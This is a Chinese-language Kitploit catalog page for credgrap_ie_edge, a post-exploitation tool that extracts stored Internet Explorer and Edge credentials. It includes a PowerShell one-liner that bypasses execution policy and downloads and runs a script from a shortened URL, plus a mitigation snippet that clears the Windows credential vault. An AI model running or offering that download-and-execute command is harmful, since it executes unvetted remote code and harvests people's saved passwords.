Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
credgrap_ie_edge — 从 Internet Explorer 和 Edge 提取存储的凭据 | Kitploit
工具/GitHubGitHub/hansesecure/credgrap_ie_edge
密码破解信息收集后渗透利用
GitHubhansesecure/credgrap_ie_edge

credgrap_ie_edge

从 Internet Explorer 和 Edge 提取存储的凭据

查看仓库
3237115年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

credgrap_ie_edge

内容:从 Internet Explorer 和 Edge 中提取存储的凭证

作者:Florian Hansemann | @HanseSecure | https://hansesecure.de

日期:04/2018

使用

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"

建议

Powershell 解决方案

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | ForEach {$vault.Remove($_)}

感谢 @nongiach 提供信息

其他解决方案

不要在浏览器中保存任何密码,使用密码管理器 ;-)

附加信息

@jaredhaight 告诉我,这段代码以前已经有人用过了。我之前并不知道,但我想添加那篇文章的链接:https://www.toddklindt.com/blog/_layouts/mobile/dispform.aspx?List=56f96349-3bb6-4087-94f4-7f95ff4ca81f&ID=606

我认为代码越小,开发出“旧”东西的可能性就越大。

下载工具